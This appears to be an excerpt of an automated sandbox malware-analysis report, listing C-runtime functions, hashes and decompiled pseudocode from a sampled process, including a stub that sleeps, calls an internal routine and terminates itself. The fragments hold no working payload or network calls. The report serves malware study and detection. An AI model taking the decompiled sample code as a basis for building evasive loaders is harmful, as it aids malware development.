String ID: T9@$h9@$hp7@$x9@$}*j$}8j
API String ID: 976542199-2627948063
Opcode ID: 13c7e32cdffca0c770453bdd792105fcb1c5b95bd883272c378d493fc4793306
Instruction ID: f25dcdb8b469caa85835e8492b42eb4c13ddbad2c26898e74d5b410cc00a1a38
Opcode Fuzzy Hash: 13c7e32cdffca0c770453bdd792105fcb1c5b95bd883272c378d493fc4793306
Instruction Fuzzy Hash: A94192B1E40218BBCB24EFD4DC49B9A77B8AB48705F1081BAB508772C1C2795BC8CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0042315A Relevance: 19.7, APIs: 13, Instructions: 238COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0042315E
__get_printf_count_output.LIBCMTD ref: 0042316C
__errno.LIBCMTD ref: 004231D2
__invalid_parameter.LIBCMTD ref: 004231F3
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00423208
_write_multi_char.LIBCMTD ref: 0042379B
_write_string.LIBCMTD ref: 004237B6
_write_multi_char.LIBCMTD ref: 004237E2
__mbtowc_l.LIBCMTD ref: 00423851

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___errno__get_printf_count_output__invalid_parameter__mbtowc_l_get_int_arg_write_string
String ID:
API String ID: 3689974179-0
Opcode ID: 91734103a5b45529ddf93585fc36ab443d0c86bba5418dc8393b7d3852622bab
Instruction ID: ee6cb6e549d8fbc35da53921bb9b7c477b183efa44a0ba4a4046472b6b535aab
Opcode Fuzzy Hash: 91734103a5b45529ddf93585fc36ab443d0c86bba5418dc8393b7d3852622bab
Instruction Fuzzy Hash: A0A190F1A002299BDF24DF45DC85BAEB774AB44305F50809AE6097B282D77C6E84CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDA5 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 0041BDA9
_strlen.LIBCMT ref: 0041BDD9
_write_multi_char.LIBCMTD ref: 0041C57E
_write_multi_char.LIBCMTD ref: 0041C5C5
_wctomb_s.LIBCMTD ref: 0041C642

Strings

45@, xrefs: 0041BDCC
-, xrefs: 0041C51E

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s
String ID: -$45@
API String ID: 1884575355-665643691
Opcode ID: 1b3a0d8cb25fc75224e6cb703063f3e1aedd6af7b9cfa12504841567bb160c17
Instruction ID: 0f3152ffcb35c9a7637fc65632e0fef91a9a427d64a02603f4c9143c0e8e57a7
Opcode Fuzzy Hash: 1b3a0d8cb25fc75224e6cb703063f3e1aedd6af7b9cfa12504841567bb160c17
Instruction Fuzzy Hash: 66A179B0D412299BDB24DF54CC89BEEB7B5EB48305F1081DAE019AB291D7789EC0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00422F84 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 222COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 00422F88
_strlen.LIBCMT ref: 00422FB8
_write_multi_char.LIBCMTD ref: 0042379B
_write_string.LIBCMTD ref: 004237B6
_write_multi_char.LIBCMTD ref: 004237E2
__mbtowc_l.LIBCMTD ref: 00423851

Strings

45@, xrefs: 00422FAB

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: _write_multi_char$__mbtowc_l_get_int_arg_strlen_write_string
String ID: 45@
API String ID: 909868375-147724152
Opcode ID: d68c5ff9bca7064516218a99dcf43f12b5b549a0f9ad50d4e45b230146a64f24
Instruction ID: e1e104b59482d837e7504534d3b14afad4f059c5549127bae7ec85c9e381ed6f
Opcode Fuzzy Hash: d68c5ff9bca7064516218a99dcf43f12b5b549a0f9ad50d4e45b230146a64f24
Instruction Fuzzy Hash: 1EA181F1E001289BDB24DF54DC85BAEB7B5AB44305F40819AE5096B281D77C5E84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00420426 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 131COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00420488
__errno.LIBCMTD ref: 00420490
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042049D
_memset.LIBCMT ref: 00420524
__errno.LIBCMTD ref: 00420563
__invalid_parameter.LIBCMTD ref: 00420584
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 00420596
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004205D1

Strings

P, xrefs: 004205A6
", xrefs: 0042058C

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: Locale$UpdateUpdate::~_$__errno_memset$__invalid_parameter
String ID: "$P
API String ID: 150879229-1577843662
Opcode ID: c1f1f5889b3313e224744b44ead36d1a46020edcb27e6b0eb7e7764d942b7136
Instruction ID: f68c81728803cca50579f650bef9d52a8e579a7357720fd5a55f76474518abe9
Opcode Fuzzy Hash: c1f1f5889b3313e224744b44ead36d1a46020edcb27e6b0eb7e7764d942b7136
Instruction Fuzzy Hash: E4514D70E00219EFCB24DF58E845AAE77B1FF44314F50862AE825673D2D738A996CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0040B405 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264memoryCOMMON

Download Yara Rule

APIs

_CheckBytes.LIBCMTD ref: 0040B419
__errno.LIBCMTD ref: 0040B444
__CrtIsValidHeapPointer.LIBCMTD ref: 0040B4A5
_CheckBytes.LIBCMTD ref: 0040B550
_CheckBytes.LIBCMTD ref: 0040B60A
_memset.LIBCMT ref: 0040B701
__free_base.LIBCMTD ref: 0040B70D

Strings

tDj, xrefs: 0040B45B

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: BytesCheck$HeapPointerValid__errno__free_base_memset
String ID: tDj
API String ID: 2211402958-2513116121
Opcode ID: a952c0d9f5c8382168a6b6c26efdf02f6aebe0f3f2b371b7ba49fb669f4b5643
Instruction ID: 8f22a8178101f7e6220e9dcae2d10830f871193a180613df78e169cc5279629e
Opcode Fuzzy Hash: a952c0d9f5c8382168a6b6c26efdf02f6aebe0f3f2b371b7ba49fb669f4b5643
Instruction Fuzzy Hash: A4918F71A40204BBEB24DB84DD86F6A7365EB44708F3441A9F604BA3D2D379EE41CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCE7 Relevance: 13.6, APIs: 9, Instructions: 105COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 0040CCEE

Part of subcall function 00411250: __crt_wait_module_handle.LIBCMTD ref: 0041129C

__encode_pointer.LIBCMTD ref: 0040CD72
__encode_pointer.LIBCMTD ref: 0040CD0A

Part of subcall function 00411230: __encode_pointer.LIBCMTD ref: 00411237

__encode_pointer.LIBCMTD ref: 0040CD91
__encode_pointer.LIBCMTD ref: 0040CDA2
__initterm.LIBCMTD ref: 0040CDE4
__initterm.LIBCMTD ref: 0040CDF6
__CrtSetDbgFlag.LIBCMTD ref: 0040CE09
___freeCrtMemory.LIBCMTD ref: 0040CE20

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __encode_pointer$__initterm$FlagMemory___free__crt_wait_module_handle
String ID:
API String ID: 3592632019-0
Opcode ID: 2dfd3b04cc4a1f39a205c9d73b47653ab33d46f8aea9614e1c73a756be20bd83
Instruction ID: 3cfa9af71cd33ffa6fe558611b9f0e6c6912b9b5cb862b10129475167383c673
Opcode Fuzzy Hash: 2dfd3b04cc4a1f39a205c9d73b47653ab33d46f8aea9614e1c73a756be20bd83
Instruction Fuzzy Hash: CB411DB5D00208DBDB14DFA5D8D1ADEBBB1EF48314F24823AE415B7390D7396981CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E808 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040E869
__aullrem.LIBCMT ref: 0040EA36
__aulldiv.LIBCMT ref: 0040EA58

Strings

', xrefs: 0040E808
0, xrefs: 0040E824
9, xrefs: 0040EA69

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$0$9
API String ID: 3120068967-269856862
Opcode ID: 54e776a26645d3dd7c4f5de35514bc97ffcf545b6fde0bbd0a4d7381a8d536f2
Instruction ID: 999b98fb8c7298e2fecd423b878867e7ed16e3dd10ee8ccc22dce97580df4d8f
Opcode Fuzzy Hash: 54e776a26645d3dd7c4f5de35514bc97ffcf545b6fde0bbd0a4d7381a8d536f2
Instruction Fuzzy Hash: 794138B1D04229CFDB60DF4AC989BAEB7B5BB44300F1049EAD048B7281C7389E91CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0041C227 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0041C288
__aullrem.LIBCMT ref: 0041C455
__aulldiv.LIBCMT ref: 0041C477

Strings

0, xrefs: 0041C243
9, xrefs: 0041C488
', xrefs: 0041C227

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$0$9
API String ID: 3120068967-269856862
Opcode ID: b533f03726811cb36025c7b2a42b992821157cc5ceeb554e34c0b73c4861ca40
Instruction ID: 83be82029f207e946626df9975687eb8c20f1560cf7cb7420df4ce6db86a2dad
Opcode Fuzzy Hash: b533f03726811cb36025c7b2a42b992821157cc5ceeb554e34c0b73c4861ca40
Instruction Fuzzy Hash: 7B41C0B1D05229DFEB24CF98CC99BEEB7B5BB44304F24819AE419A7240C7389E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0041C214 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0041C288
__aullrem.LIBCMT ref: 0041C455
__aulldiv.LIBCMT ref: 0041C477

Strings

0, xrefs: 0041C243
9, xrefs: 0041C488

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 0$9
API String ID: 3120068967-1975997740
Opcode ID: 12e61f45dd5dc814ab682159396d5639ef33753a08743e4182718c821c33b756
Instruction ID: 1c28961741ecbaa86624a83dbd5a07abc391f185ed774a2f5a8a16e7b4a5c358
Opcode Fuzzy Hash: 12e61f45dd5dc814ab682159396d5639ef33753a08743e4182718c821c33b756
Instruction Fuzzy Hash: 4241C0B1D15229DFEB24CF98CCD9BEEB7B5BB44304F24819AE419A7240C7389A85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040E869
__aullrem.LIBCMT ref: 0040EA36
__aulldiv.LIBCMT ref: 0040EA58

Strings

0, xrefs: 0040E824
9, xrefs: 0040EA69

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 0$9
API String ID: 3120068967-1975997740
Opcode ID: 4d6c798d8d17587dd03a2d60ce3a0c7f90b9fe9045ed1213e0fbd373363de918
Instruction ID: b92376609688670c7e3961e508d6241c16968a634c878d17c113e96c6e52a278
Opcode Fuzzy Hash: 4d6c798d8d17587dd03a2d60ce3a0c7f90b9fe9045ed1213e0fbd373363de918
Instruction Fuzzy Hash: 9E4138B1D04229CFDB60DF4AC989BAEB7B5BB44300F1089EAD448B7291C7389E91CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00423429 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00423490
__aullrem.LIBCMT ref: 00423660
__aulldiv.LIBCMT ref: 00423682

Strings

', xrefs: 00423429
9, xrefs: 00423693

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$9
API String ID: 3120068967-1823400153
Opcode ID: 169aff6671f9313a680a145ee6d7ef44023d1f470a3c21be42b5d24018d2f572
Instruction ID: dafcd783e9301bd39f279c922ff53285d0df72767d771a73f71fb2b87dee5b66
Opcode Fuzzy Hash: 169aff6671f9313a680a145ee6d7ef44023d1f470a3c21be42b5d24018d2f572
Instruction Fuzzy Hash: 3E4115B1E10129AFDB24CF48D881BAEB7B5FF85315F5040AAD248AB340D7389E81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 00420303 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00420354
__errno.LIBCMTD ref: 004203CC
__invalid_parameter.LIBCMTD ref: 004203ED
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004203FF

Strings

u!hXx@, xrefs: 004203A3

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: Locale$UpdateUpdate::~___errno__invalid_parameter_memset
String ID: u!hXx@
API String ID: 356215427-462105071
Opcode ID: dc7e206e5030c0d04b92983ce4c6d356c3b258e488b63ec482e4c58a02224557
Instruction ID: 972adf7f6301b2c5ed50f1b6cdc5207a5d1bc5990b70fa804c0a7dcdb431594f
Opcode Fuzzy Hash: dc7e206e5030c0d04b92983ce4c6d356c3b258e488b63ec482e4c58a02224557
Instruction Fuzzy Hash: BA317F70A00219DBCB24DF58D845BAE77B1BB04304F60822AEC256B2D2D779A955CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00423416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00423490
__aullrem.LIBCMT ref: 00423660
__aulldiv.LIBCMT ref: 00423682

Strings

9, xrefs: 00423693

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 23b725871bccf5c27e5dad8bb98b2624bab2190eb293eff164068b15ece5ffba
Instruction ID: df45d480d563740c06fdb6c63739f3034ad1d1df669f47bd7e3f7a5271688dec
Opcode Fuzzy Hash: 23b725871bccf5c27e5dad8bb98b2624bab2190eb293eff164068b15ece5ffba
Instruction Fuzzy Hash: BE4115B1E10129AFDB24CF48D881BAEB7B5FF85315F5041AAD148AB340D7389E85CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00423464 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00423490
__aullrem.LIBCMT ref: 00423660
__aulldiv.LIBCMT ref: 00423682

Strings

9, xrefs: 00423693

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 82dc154666f3e64ee63cfce9a6428573f9608a50a65a49c96da4ef156cc17787
Instruction ID: a39ce106d392ae72e15bb7868b1bf53a28d405a050f8026a4fb258c9dddafa84
Opcode Fuzzy Hash: 82dc154666f3e64ee63cfce9a6428573f9608a50a65a49c96da4ef156cc17787
Instruction Fuzzy Hash: 784125B1E10129AFDB24CF48D881BAEB7B5FF85315F4045AAD248AB340C7389E80CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0040E83D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040E869
__aullrem.LIBCMT ref: 0040EA36
__aulldiv.LIBCMT ref: 0040EA58

Strings

9, xrefs: 0040EA69

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: c4ed0183b485bac8ac56ead1154e045f65d7a6185391f1773554547b7e6b40cd
Instruction ID: ba53d76961d864d63b492216409d86f07abe96fe029687505950fafc62fcaa94
Opcode Fuzzy Hash: c4ed0183b485bac8ac56ead1154e045f65d7a6185391f1773554547b7e6b40cd
Instruction Fuzzy Hash: 7C411BB1D04229CFDB64DF4ACD89BAEB7B5BB84300F1049AAD049B7291C7389E91CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0041C25C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0041C288
__aullrem.LIBCMT ref: 0041C455
__aulldiv.LIBCMT ref: 0041C477

Strings

9, xrefs: 0041C488

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 4f84507cac35cc4b0fbe087441514c8f73c0d397b7d4b094ca4c7d88fe7328c4
Instruction ID: abe1cb3789caa31172285036e68a8f1809a52c0cbe11b998aced4ad0cba22b0a
Opcode Fuzzy Hash: 4f84507cac35cc4b0fbe087441514c8f73c0d397b7d4b094ca4c7d88fe7328c4
Instruction Fuzzy Hash: D341C1B1D15229DFEB24CB49CC99BEEB7B5BB84300F24859AE419A7240C7389A81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0042340D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00423490
_get_int64_arg.LIBCMTD ref: 004234B8
__aullrem.LIBCMT ref: 00423660
__aulldiv.LIBCMT ref: 00423682

Strings

9, xrefs: 00423693

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: d66de635ff47f4e6bab33b237b70d38c64ec8331727ae66c30ef89d55212e2e5
Instruction ID: 2dba36d7f3cccfb3b929d6e8bd0be33a75890f2d742b79a38dcf0bbc7c51080b
Opcode Fuzzy Hash: d66de635ff47f4e6bab33b237b70d38c64ec8331727ae66c30ef89d55212e2e5
Instruction Fuzzy Hash: 2841F4B1E10129AFDB24CF48D981B9EB7B5BF85315F5045EAE248AB301C7389E81CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C20B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0041C288
_get_int64_arg.LIBCMTD ref: 0041C2B0
__aullrem.LIBCMT ref: 0041C455
__aulldiv.LIBCMT ref: 0041C477

Strings

9, xrefs: 0041C488

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 46fd94558219cb7010b82255a75191d8f9373794b22735a5d1946baff17ad9cc
Instruction ID: a4c8e9c7323eb21b7705971d64fed7ace7ab66e1ca16ad76757a1d0a843a32a6
Opcode Fuzzy Hash: 46fd94558219cb7010b82255a75191d8f9373794b22735a5d1946baff17ad9cc
Instruction Fuzzy Hash: 1141C1B1D05228DFEB24CB58CCD9BEEB7B5BB44304F20819AE419A7240C7389E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040E869
_get_int64_arg.LIBCMTD ref: 0040E891
__aullrem.LIBCMT ref: 0040EA36
__aulldiv.LIBCMT ref: 0040EA58

Strings

9, xrefs: 0040EA69

Memory Dump Source

Source File: 00000000.00000002.335054746.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_409000_hOdgEiePTe.jbxd

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: c7011a80ebf6a07089807e988c132094578a4c6d773c79cce0317ca3a45baaef
Instruction ID: a10f2e0b22c10e87f4c99f522202ad43aa91e29f57fc1d773cdaee5a18c9f4f2
Opcode Fuzzy Hash: c7011a80ebf6a07089807e988c132094578a4c6d773c79cce0317ca3a45baaef
Instruction Fuzzy Hash: F14118B1E04229DFDB64DF4AC989B9EB7B5BB84300F1049EAD049B7291C7389E91CF05

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: hcthhbiPID: 6328, Parent PID: 848COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	12.7%
Signature Coverage:	0%
Total number of Nodes:	322
Total number of Limit Nodes:	27

Executed Functions

Function 004017E2 Relevance: 3.1, APIs: 2, Instructions: 53
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004017E2(void* __edx) {
				void* _t4;

				 *((intOrPtr*)(_t4 - 0x77)) =  *((intOrPtr*)(_t4 - 0x77)) + __edx;
			}

0x004017e2

APIs

Sleep.KERNELBASE(00001388), ref: 00401823
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040184B

Memory Dump Source

Source File: 0000000D.00000002.382438227.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_hcthhbi.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 4dede37128b39f4f7e7a4df5dc33f26b0f76fbcd4aaa8ffb007c11c557e31b11
Instruction ID: ddaf0562df841adfab300f0276baae716c17d25714fd681a3a6e16616d485b4c
Opcode Fuzzy Hash: 4dede37128b39f4f7e7a4df5dc33f26b0f76fbcd4aaa8ffb007c11c557e31b11
Instruction Fuzzy Hash: EC015233148208EBDB017AA59C41DA97729AB45754F30C537FA03791F1D67D8713A72B

Uniqueness

Uniqueness Score: -1.00%

Function 004017E3 Relevance: 3.1, APIs: 2, Instructions: 53
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 18%

			E004017E3(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t8;
				char* _t9;
				void* _t11;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr* _t22;
				void* _t24;
				void* _t26;

				_push(0x181b);
				_t8 =  *_t21;
				_t22 = _t21 + 4;
				L00401118(_t8, _t13, 0x61, _t19, _t20, _t24);
				_t14 = _a4;
				Sleep(0x1388);
				_t3 =  &_v8; // 0x1b68f34d
				_t9 = _t3;
				_push(_t9);
				_push(_a12);
				_push(_a8);
				_push(_t14); // executed
				L00401360(); // executed
				_t25 = _t9;
				if(_t9 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t9);
					_push(_t14); // executed
					E00401432(_t14, _t17, _t18, _t19, _t26); // executed
				}
				 *_t14(0xffffffff, 0); // executed
				_t11 = 0x181b;
				_push(0x61);
				_t16 =  *_t22;
				L00401118(_t11, _t14, _t16, _t19, _t20, _t25);
				return _t11;
			}

APIs

Sleep.KERNELBASE(00001388), ref: 00401823
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040184B

Memory Dump Source

Source File: 0000000D.00000002.382438227.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_hcthhbi.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: eed50f69cd3fa7174ad76653e673f5296f9ebb16c169d6494c900a5425ffe511
Instruction ID: 1d0556d2ce3487287f662705d53e2785c513140bae9e3f24436a296874fe77da
Opcode Fuzzy Hash: eed50f69cd3fa7174ad76653e673f5296f9ebb16c169d6494c900a5425ffe511
Instruction Fuzzy Hash: 15017533108208F7D7017A958C42DAA3628AB45754F30C437BA03790F1D57DDB12676B

Uniqueness

Uniqueness Score: -1.00%

Function 004017EE Relevance: 3.0, APIs: 2, Instructions: 47
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E004017EE(void* __edi, void* __esi) {
				intOrPtr _t8;
				intOrPtr* _t9;
				void* _t11;
				void* _t13;
				intOrPtr* _t14;
				intOrPtr _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t25;
				intOrPtr* _t26;
				void* _t29;
				void* _t31;

				_t21 = __esi;
				_t19 = __edi;
				_push(0x181b);
				_t8 =  *_t25;
				_t26 = _t25 + 4;
				L00401118(_t8, _t13, 0x61, __esi, 0x1b68f351, _t29);
				_t14 =  *((intOrPtr*)(0x1b68f359));
				Sleep(0x1388);
				_t9 = 0x1b68f34d;
				_push(_t9);
				_push( *0x1B68F361);
				_push( *0x1B68F35D);
				_push(_t14); // executed
				L00401360(); // executed
				_t30 = _t9;
				if(_t9 != 0) {
					_push( *0x1B68F365);
					_push( *((intOrPtr*)(0x1b68f34d)));
					_push(_t9);
					_push(_t14); // executed
					E00401432(_t14, _t18, _t19, _t21, _t31); // executed
				}
				 *_t14(0xffffffff, 0); // executed
				_t11 = 0x181b;
				_push(0x61);
				_t17 =  *_t26;
				L00401118(_t11, _t14, _t17, _t21, 0x1b68f351, _t30);
				return _t11;
			}

APIs

Sleep.KERNELBASE(00001388), ref: 00401823
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040184B

Memory Dump Source

Source File: 0000000D.00000002.382438227.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_hcthhbi.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 0a9656e0e1b5f21b45c9f82a7808bfe019579950b80e51e68eaabb0023cd3f01
Instruction ID: 6a2648c31bf342f80e2744bc490c75df06b0a743f4722301b2fbabc3dba0a0aa
Opcode Fuzzy Hash: 0a9656e0e1b5f21b45c9f82a7808bfe019579950b80e51e68eaabb0023cd3f01
Instruction Fuzzy Hash: 54016733508304ABDB017AA18C42EA937289B45754F24C577BB13790F2D57DCB12A72B

Uniqueness

Uniqueness Score: -1.00%

